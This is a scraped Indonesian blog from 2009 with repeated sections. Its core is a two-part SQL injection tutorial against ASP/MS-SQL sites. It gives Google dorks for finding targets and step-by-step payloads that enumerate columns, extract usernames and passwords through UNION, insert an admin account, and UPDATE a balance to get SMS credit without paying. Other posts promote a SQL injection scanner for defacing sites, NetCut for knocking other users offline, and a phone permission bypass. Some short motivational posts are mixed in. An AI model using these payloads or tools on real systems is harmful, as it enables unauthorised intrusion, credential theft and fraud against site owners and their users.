:::PREFACE::.
============
Kalau di PART 1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail
.::BODY::.
============
Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel PART 1 :)
:::PREFACE::.
============
Kalau di PART 1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail
.::BODY::.
============
Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel PART 1 :)
Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di input boxnya :
www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln engganya tuh situs kita ketikan ' having 1=1-- di input box atau URL error tadi , contoh : www.target.com/ login.asp? err=' having 1=1-- then,....
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause
itu error messagesnya, kini kita group field UserID dari table Users, stringnya : ' group by UserID --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.
muncul lagi error seperti itu....lalu lagi kita Group. Kini stringnya adalah ' group by field1,field2 --
contoh : ' group by UserID,ClientName --
then,...
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in
either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai semua field kita
ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :) apabila sudah lama melakukan looping dan akhirnya ketika group terakhir kita lakukan dan tidak keluar error messagesnya maka error yang terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali, tergantung admin yang masangnya jadi susah kalau maen teabk2an ajah....contoh field yang pernah gw temuin :
' group by UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
, OperatingSystem, PrefferredGraphi cFormat -- >> ada 9 field!!! jangan males dalam proses Looping :P
setelah dapet semua field, kini yang kita lakukan adalah mencari siapa aja user yang ada dalam table Users dan kolom UserName... caranya? kita pake Union apa itu UNION??? union adalah perintah SQL dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen gunain Union ini kita harus tahu ada berapa field dalam table tadi
sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;
nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from
Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah kalau begitu kita masukin syntax sql union untuk melihat username :
' union select min(UserName) ,1,1,1 from Users where username > 'a'-- jadi hasilnya : select * from Users where UserName ==' union select min(UserName) ,1,1,1 from Users where username > 'a'--and Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error messages lagi yang akan menampilkan sebuah username lebih dari huruf a ,contoh:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /
tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake string union tadi nanti akan muncul username2 lain....lalu bagaimana dengan passwordnya? ??
ok union beraksi kembali : ' union select min (UserName),1, 1,1,1,1,1, 1,1 from Users where username > 'Agile'-- lalu akan muncul error yang memberitahukan passwordnya, contoh :
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /
kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya Surfer...hehehe
selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. .... caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values
(0,'lucifer' ,'lucifer' ,'lu','cid' ,' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it ',1)-- >> artinya kita masukan id kita dalam urutan 0, lalu username 'lucifer', password 'lucifer' Fname (frontName) itu 'lu', Lname(LastName) sebagai 'cid', dan EmailAddress ' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it '...... coba kita login dengan user buatan kita tadi....BINGO! selamat anda berhasil menjebol database situs target.....
Minggu, 25 Oktober 2009
SQL INJECTION JUST 4 LEARNING!!!!! PART 2
SQL INJECTION JUST 4 LEARNING!!!!! PART 1
::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE
::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.
::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE
::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.
::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa pemrograman website ASP.
::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe untuk menginject sql ini anda perlu memperhatikan input-inputan dalam situs itu yang sekiranya connect dengan SQL database situs itu, atau bisa juga dengan menambah dari link url di kotak browser anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari target yang vuln seperti kondisi diatas anda perlu mencarinya yang .asp nah seperti biasa....GOOGLING! !! hehehe key wordnya di google adalah :
1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp
semuannya itu banyak kombinasinya lainnya itu tergantung seberapa jauh anda kreatif dalam mencari target di google.nah, kanre disini gw bahas cara inject ke situs web to sms so searchnya : asp,web to sms atw Send SMS, ASP
ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan yang masuk ke database itu ga, misalnya search product, member login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs berita nasional di indonesia...
nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya connect ke database situs itu, contoh isa di login, member, search, dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject, kita injet di :
userid : ' having 1=1--
Password :fuzk3
lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi dungs? ok kita loop lagi sekarang kita inject : ' group by UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini kita gunain perintah group by untuk menggroup kolom ingin kita lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25
nah sekarang kita tau apa aja kolomnya...hehehe penerapan selanjutanya adalah misal situs itu adalah situs pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms dari web, namun harus ada account yang digunakan untuk mengirim sms itu, jadi account itu harus ada nilainya dan untuk itu kita harus mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe so kita inject aja....sebelumnya kita harus jadi member kan gratis ini daftarnya... setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log ke situs itu dengan id kita, cari tahu string khusus yang digunakan web itu untuk menghitung account sms kita, misalnya : cell nah, inilah injectnya... .cari login inputan lagi misal /member.asp nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di forgot password : dengan inputan sama...jreeen ketika di jalankan ga ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES BRO!!! :)
Minggu, 18 Oktober 2009
Beberapa Ebook Motivasi Sukses
Sukses yang kita dapatkan haruslah dengan berkerja keras dan juga kita harus bisa menyaring bahkan kita bisa bersikap tuli terhadap semua hal yang mendeskriditkan kita dan juga membuat kita merasa jatuh dan juga membuat kita menjadi pesimis sehingga tidak yakin atas hal yang kita lakukan..
Sukses yang kita dapatkan haruslah dengan berkerja keras dan juga kita harus bisa menyaring bahkan kita bisa bersikap tuli terhadap semua hal yang mendeskriditkan kita dan juga membuat kita merasa jatuh dan juga membuat kita menjadi pesimis sehingga tidak yakin atas hal yang kita lakukan..
sepertihalnya ada cerita tentang katak menuju tiang tertinggi. dimana pada waktu itu ada lomba antara katak-katak dan ada satu katak kecil yang dideskriditkan oleh katak-katak yang besar dan sehingga pada waktu perlombaan dimulai banyak katak2 yang kewalahan dan katak itu pun juga kewalahan tetapi dia tetap berkerja keras untuk menuju puncak tertinggi dan akhirnya katak tersebut sampai pada puncak dan ketika sudah selesai katak-katak yang lain bertanya bagaimana caramu mencapai puncak dan katak itu menjawab saya TULI dan BERKERJA KERAS....
sedot disini -->
tips memotivasi diri
Personal Winning
i have dream martin luther
10 penyakit mental
kisah 3 pencuri
Rabu, 14 Oktober 2009
Sofware Fakecall buat BB OS 4 ke atas...
ini aplikasi lumayan lah buat iseng2
jadi bagi kalian Pengguna BB gw share deh
ini aplikasi lumayan lah buat iseng2
jadi bagi kalian Pengguna BB gw share deh
sedoot disini....
UNLOCK UR BB
Bingung mo nulis apa karna gw sendiri masih awam dengan BlackBerry tapi gw cuma mo sekedar share aja sofware untuk unlock blackberry
Bingung mo nulis apa karna gw sendiri masih awam dengan BlackBerry tapi gw cuma mo sekedar share aja sofware untuk unlock blackberry
sedott disini..
Selasa, 13 Oktober 2009
INGIN PUNYA ACCOUNT BANYAK DI FACEBOOK DENGAN SATU ACCOUNT GMAIL
Ingin punya account yang banyak di facebook atau di situs lainnya? Tapi hanya punya satu account Gmail !
Ingin punya account yang banyak di facebook atau di situs lainnya? Tapi hanya punya satu account Gmail !
Berikut tipsnya :
1. Menambahkan tanda + dan kalimat bebas
Alamat gmail anda sebenarnya bisa menjadi banyak,yaitu dengan menambahkan tanda + dan kalimat bebas pada username anda. Contoh.
Alamat aslinya: boy@gmail.com Lalu jika di tambah tanda + dan kalimat bebas maka menjadi:
* boy+aku@gmail.com
* boy+saya@gmail.com
* boy+aliasku@gmail.com
Semua pesan yang masuk ke alamat palsu tersebut akan masuk pada inbox yang sama,yaitu: boy@gmail.com
2. Menambahkan titik
Cara ke 2 yaitu dengan menambahkan titik pada username,contoh.
Alamat aslinya: girls@gmail.com
Maka jika ditambahkan titik menjadi:
+ gir.ls@gmail.com
+ gi.rls@gmail.com
+ g.irls@gmail.com
Semua pesan yang masuk ke alamat palsu tersebut,akan masuk pada inbox alamat asli (girls@gmail.com)
Googlemail
Setiap anda daftar di Gmail,secara otomatis anda punya 2 alamat email dengan domain yang berbeda. Yaitu:
+ username@gmail.com
+ username@googlemail.com
Jadi anda dapat menggunakan alamat email dengan domain gmail.com maupun googlemail.com
Trik diatas dapat juga diterapkan pada alamat email dengan domain googlemail.com
Membaca Sms Yang Sudah Dihapus HP Nokia 6300
SMS kadang menjadi sesuatu yang sangat berharga bagi seseorang, namun terkadang SMS pun dapat menjadi malapetaka bagi seseorang. Oleh karena itu berbagai aplikasi untuk melindungi SMS dari tangan yang tidak dikehendaki pun sudah banyak tersedia. Bagaimana jika SMS tersebut merupakan suatu bukti yang sangat diperlukan, akan tetapi SMS tersebut sudah dihapus atau terhapus.
SMS kadang menjadi sesuatu yang sangat berharga bagi seseorang, namun terkadang SMS pun dapat menjadi malapetaka bagi seseorang. Oleh karena itu berbagai aplikasi untuk melindungi SMS dari tangan yang tidak dikehendaki pun sudah banyak tersedia. Bagaimana jika SMS tersebut merupakan suatu bukti yang sangat diperlukan, akan tetapi SMS tersebut sudah dihapus atau terhapus.
Berikut cara untuk melihat kembali SMS yang sudah dihapus. Dalam hal ini SMS yang menggunakan ponsel Symbian. Silakan buka aplikasi File manager di ponsel Anda yang menyediakan fasilitas Hex Viewer, misalnya: X-Plore. Jika belum punya silakan download terlebih dahulu. Kemudian ekstrak dan pilih jenis aplikasi yang akan diinstall sesuai dengan jenis ponsel yang Anda gunakan. Bila proses instalasi telah selesai, silakan buka X-Plore kemudian buka folder Mail yang terdapat dalam folder System. Folder System ini biasanya tersembunyi, oleh karena itu munculkan terlebih dahulu dari Menu, Tools, Configuration atau langsung tekan tombol ‘0‘. Kemudian cari folder System\Mail, dan silakan dibuka setiap folder yang ingin dibaca dan isinya berupa pesan yang ada di ponsel Anda, baik kotak masuk maupun keluar termasuk juga konsep. Jadi, kita bisa membaca semua sms yang sudah dihapus dan belum dihapus dari folder “Mail”.
Terus, bagaimana cara membacanya? Silakan pilih file yang ingin dibaca, kemudian pilih Menu, File, Hex viewer. Nah, nanti isi pesan tersebut akan ditampilkan. Silakan lihat dan baca pada kolom ketiga dari kiri. Demikianlah, semoga bisa membantu.
tapi sebelumnya harus hack Hp agar dapat diinstall aplikasi hex dan mobi explorer berikut caranya!!!!
Aplikasi java apabila tidak memiliki sertifikat apabila hendak membaca atau mengedit data dihp maka akan keluar pertanyaan seperti “perbolehkan aplikasi xxx untuk membaca data pengguna” atau “perbolehkan aplikasi xxx untuk edit data pengguna” namun dengan trik ini anda tidak akan menemukan pertanyaan itu lagi.
Caranya seperti dibawah ini
1. Instal aplikasi java yang ingin security questionnya dihilangkan.
2. Jalankan aplikasi dan keluarkan
3. Arahkan ke aplikasi tekan tombol
option -> aplication access -> phone access -> add and edit user data -> ask every time.
4. Tekan tombol
option -> aplication access -> read user data -> read user data -> not allowed
5. Tekan tombol option -> aplication access -> add and edit user data -> not allowed
6. Buka mobimb, hubungkan ponsel ke komputer
7. Kopi file _jmr_suite_attrib_file.jmr yang ada di “A:/hiddenfolder/” ke desktop dan ubah namanya menjadi xxx
jmr
8. Putuskan hubungan ponsel dengan komputer dan keluarkan mobimb
9. Arahkan lagi keaplikasi
tekan tombol option -> application access -> phone access -> read user data -> ask everytime
10. Tekan tombol option -> application access -> phone access -> add and edit user data -> ask everytime
11. Buka lagi mobimb dan hubungkan ponsel dengan komputer
12. Kopi lagi file _jmr_suite_attrib_file.jmr yang ada di “A:/hiddenfolder/” ke desktop (tidak usah direname)
13. Buka cygnus hex editor buka kedua file *.jmr yang dikopi kedesktop tadi, dan klik menu tools -> klik compare files… dan klik find all different
14. Akan ada string yang berbeda seperti “01 01 00″ dan “02 02 00″
15. Ganti string yang berbeda pada file _jmr_suite_attrib_file.jmr (bukan pada xxx.jmr) menjadi “06 06 00″ (tanpa tanda petik)
catatan: string untuk hp lain mungkin berbeda, jadi coba dengan “02 02 00″ atau “03 03 00″ sampai “09 09 00″
untuk hp nokia 6300 dan 6270 menggunakan “06 06 00″ bisa bekerja
16. Simpan file _jmr_suite_attrib_file.jmr yang sudah diedit
17. Buka lagi mobimb dan hubungkan ponsel ke komputer
18. Paste-kan file _jmr_suite_attrib_file.jmr yang sudah diedit ke “A:/hiddenfolder/”
19. Jalankan aplikasi java anda, jika berhasil maka ponsel anda tidak akan menanyakan persetujuan anda untuk mengakses data dihp anda.
dan untuk aplikasi Explorer nya
sedot disini yach......
Sofware SQL INJECTION SCAN
Bagi Yang Mo Coba2 Untuk Mendeface Suatu Web Dengan Cara Menginject Scan
Sofware Ini Digunakan Untuk Menscaning Kelemahannya....
Bagi Yang Mo Coba2 Untuk Mendeface Suatu Web Dengan Cara Menginject Scan
Sofware Ini Digunakan Untuk Menscaning Kelemahannya....
so sekali lagi keep trust yach awas ada karma lho klo asal-asalan mendeface web seseorang....
sedottt atuhh...
HUAWEI C2801 UNLOCK!!!!!!!
bagi kalian yang mo unlock hp esia kalian mo di unlock
bagi kalian yang mo unlock hp esia kalian mo di unlock..
memang hp esia itu ga ada matinya dengan bantuan sofware dan juga kabel data kalian bisa menjadikannya sebagai modem wow....
sedott atuh.....
Net cut 3.0 yang jahat!!!!!
net cut adalah sofware untuk mematikan komputer lain dalam satu jaringan dan jika kalian semua ingin usil dan berinternet secara curang yach sofware ini lah yang cocok
net cut adalah sofware untuk mematikan komputer lain dalam satu jaringan dan jika kalian semua ingin usil dan berinternet secara curang yach sofware ini lah yang cocok
tapi sebelum kalian semua menggunakannya ijin dulu yach sama teman2 kalian dan ingalah jangan pernah merugikan orang lain untuk kepentingan pribadi........
sedooot atuh disini....
Rabu, 07 Oktober 2009
Ketika Tuhan Berkehendak Lain!!!!
"Saat kita terlelap dalam tidur kita
Disertakan oleh puluhan mimpi indah
Yang membuat kita termotivasi
dengan segala upaya dan cara untuk meraih mimpi tersebut"
Saat kita terlelap dalam tidur kita
Disertakan oleh puluhan mimpi indah
Yang membuat kita termotivasi
dengan segala upaya dan cara untuk meraih mimpi tersebut
tatkala kita selalu khilaf untuk mengucapkan syukur terhadap mimpi kita yang akhirnya kita selalu menjadi manusia yang tak berterima kasih atas karunia mimpi indah yang diberikan oleh tuhan. tapi dikala kita mendapatkan mimpi buruk kita selalu mengucapkan keluh kesah kita terhadap mimpi tersebut dan selalu berdoa kepada tuhan supaya mimpi buruk tersebut tidak berkepanjangan.....
sadarkah kita atas semua kehendak tuhan yang selalu tidak sesuai dengan yang kita rencanakan apabila kita berada di jalan yang benar selalu saja Tuhan memberikan ribuan cobaan dan juga setan memberikan jutaan godaan terhadap kita dengan kejutan-kejutan dan juga keindahan-keindahan akan dosa yang telah kita tinggalkan.
ketika kita mempunyai rencana dan tuhan berkehendak lain!!!!
janganlah pernah kita menganggap tuhan itu tidak ada dan tuhan itu tidak mengetahui apa yang telah kita perbuat semasa hidup kita, dan juga disaat kita melakukan hal yang kita sadari dan hal itu adalah saat bertentangan dengan perintah tuhan.
dan disaat kita bersujud kepadanya janganlah kita merasa tidak pantas walau dalam keadaan apapun, karena tuhan selalu menerima kita dan memaafkan kita baik dalam keadaan apapun
